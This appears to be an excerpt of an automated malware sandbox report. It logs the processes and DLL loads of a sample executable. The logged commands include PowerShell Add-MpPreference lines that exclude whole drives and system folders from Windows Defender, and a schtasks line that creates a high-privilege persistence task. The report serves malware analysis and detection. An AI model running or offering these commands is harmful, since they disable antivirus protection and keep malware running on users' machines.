Process created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe" |
|
Source: unknown |
Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe" |
|
Source: unknown |
Process created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe" |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline" |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline" |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP" |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe' |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat" |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP" |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\chcp.com chcp 65001 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe" |
|
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: ktmw32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: dlnashext.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: wpdshext.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\schtasks.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\schtasks.exe |
Section loaded: taskschd.dll |
Jump to behavior |
Source: C:\Windows\System32\schtasks.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\schtasks.exe |
Section loaded: xmllite.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: miutils.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wmidcom.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: miutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wmidcom.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
